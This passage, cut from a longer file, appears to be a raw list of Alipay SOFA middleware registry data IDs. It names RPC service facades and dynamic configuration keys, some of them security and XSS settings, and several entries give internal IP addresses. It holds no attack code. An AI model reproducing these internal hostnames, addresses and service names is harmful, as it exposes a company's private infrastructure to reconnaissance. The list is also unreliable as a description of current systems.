NFIG","com.alipay.icsprod.common.service.facade.api.OnlineTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.intl.idataops.git.GitClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.officialTeamNikeName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.membercenter.service.facade.PreCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccounter.facade.UserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:cstrategycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.client.facade.MonitorDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.SignContractSwitch.signContractSceneCodeWhiteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instinfo.service.facade.spi.InstInfoInvokeService:1.0:customscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.72.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insscenemarket.common.facade.GameConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.modelFailRetry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbpromocore.common.service.cert.api.CertTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.PortraitMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.gmcommon.common.drm.GmCommonDrmValueResource.gstoreUrlLinkParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:drmdemos@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.fixed.service.facade.FixedPurchaseProtocolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:gfacceptance.product.IncomeAmortizeProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-S-MOBILEAPP-CDN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:nearbyshopbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:approval_process_initiation_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.ZdalSequenceRepository:1.0:finTransferZdalSequenceRepository@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.servicelibrary.ServiceLibrarySearchFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:pcreditbill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreement.card.PcreditCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtCpBizTypeCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tallycore.common.service.facade.QueryConsumerRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.engine.cert.service.CaBizManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mmtcafts@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.EquityActiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.inner.MiniVersionInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.SDKTest:name=com.alipay.dwebupload.client.drm.DomainConfig.downloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_settleAccountNatureCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FCGUABUS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskService:1.0:sofa4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.manager.ClientPerfAlarmManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antreclusegw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:fincapacity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemrp.common.service.facade.KbItemBatchServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.globalprod.common.service.facade.SubCardBindInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.core.service.taskflow.TaskStrategyTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FundConvertConfigRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.226.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.forumactivity.ForumActivityDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.service.facade.foi.AssetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.biscenter.uem.common.service.facade.process.UEMProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.common.service.facade.subscribe.api.SubscribeTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icontrol.common.service.facade.dispatch.IcDispatchConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.inst.InstAutoEnterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.SlowSqlDiagSqlBusinessSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@finlinkboss#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobileappcommon.common.service.facade.clientpg.MobilePgTaskConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.114.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_CIFMETADATA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditchannel.facade.promotion.service.PromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.core.service.operationlog.OperationLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.mng.KnowledgeFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectcore.common.service.facade.api.SelectRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.prod.facade.AmountTransferManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sda_appUpgradeFlowTask_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zmngalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.reindeer.SceneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PermissionFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:cancelAntProcessAuditNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.RegionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkisvplatform.common.service.facade.couponparam.CouponParamFileBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.queryBanner,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordercore.mrch.common.service.emergency.api.PdUsageRecordOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.biz.service.test.OfflineTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.analyze.alpharisk.core.infocode.api.IUctInfoCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graymng.common.service.facade.api.GrayDetectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sitecenter:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.ImmuneModelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditprod.service.PcreditPagedQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizHierarchyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.merchant.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.catalog.StandardCatalogConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.EventSyncConvertMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudstrategy.facade.onekeysite.OneKeySiteCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssPolicyString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.service.facade.ChatFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.WeaknessFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.shadowQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.QueryChargeoffUniqueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:bkpayplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filefactory.service.facade.FilePlatformAssembleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitytradecore.common.service.facade.mng.LimitedAmountConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vein.winbillboard.common.service.facade.defense.IServiceRuleRelatService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.AemcStartRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.ProductAbossApiRelationConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.requiremng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instasset.ucm.masterdata.InstAliasQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.fincommonbff.drm.Switches.readNewCrs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insusercenter.facade.asset.api.InsAssetFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.InteractionDemoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.api.CreateAccOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromobatch.common.service.facade.BatchTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.holder.HolderGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IPAYMENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfocore.common.service.facade.cds.mng.AbTestSolutionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvServerAbilityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.208.33.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agmcenter.common.service.facade.api.ProtocolComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.sfa.api.SfatransAssetLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.126.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_TULINGSERVICE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.test.demo.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.ReductionAmountsRateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_SOFASENTINEL-DIRECT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.prodmng.facade.process.ProcessConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.LocalCacheRefreshDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:progov_productFlowCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.common.manage.facade.api.solution.SolutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.tag.TagAdminManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.rule.RuleCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappconfig.common.service.facade.api.AppOperateDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.SubscribeUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.ipromotion.common.service.facade.api.prod.VoucherAwardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.opencore.service.facade.auth.AuthFieldQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antgroup.zmxy.zmcacceptance.common.service.facade.CreditSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_BANK_TRANSFER_ORDER_GENERATE_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dchaincustomer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.mcard.api.MCardtransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_register_login@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.source.doom.DoomAppManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_MST_TS_CACHE_REFRESH@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_FAULT_ISO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.97.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.almcenter.service.facade.api.fundallocation.FundPlanCommandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.176.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.ChaosRiskConsultationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CSASSISTANT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.internal.ParmTaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.biz.shared.event.handler.UniformEventHandler:1.0:luckyBagRecentPeopleUniformRZEventHandler$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditkit.facade.service.SceneRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.82.87.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hell.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.DspCreativeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mychain.baas.common.user.service.ChainAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quezaomng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.certifymng.biz.permlimit.drm.DowngradeSwitchConfig.skipLimitQueryOnMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.openPipelineSnapshot,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.DisplayCategoryQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradequery:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.199.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipromotion.common.service.facade.api.prod.CampaignConsultHKFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.giftprod.common.service.facade.GiftSnsShareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.login.LoginAccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.event.common.service.facade.api.eventcodeprefix.EventCodePrefixQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.128.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acauthcore.common.service.facade.manager.ActionRamInfoManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mcomment.common.service.facade.backmanagement.MarketingManagementUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.checkPreExecDateSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.service.facade.FlowInService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.171.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.cfmng.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsearch.common.service.facade.api.shadingword.ShadingWordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCPledgeVehicleCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:gzmsfesa-sffminipkg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IConfigRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilepromo.common.service.facade.bet.CampManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.secretary.WorkAssistantPersonalTaskInstanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdatalink.common.service.facade.datalink.CheckPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:auth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:lendpofprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.HotPlateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.DiscountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.PublicActiveClassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:csinsight_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.product.PushPurhcaseProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.sceneinvest.starwish.api.oneclick.StarWishAndContractOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.routeClient:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dacuprod.service.facade.BuildSiteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:accenterAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.sdk.infra.queue.MsgQueue:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.riskmng.logControlDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEscape,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.ChaosChangeMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.FileDrillDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_CREDITPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestprod.facade.api.PlaybackDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskOperateHistoryQueryService:1.0.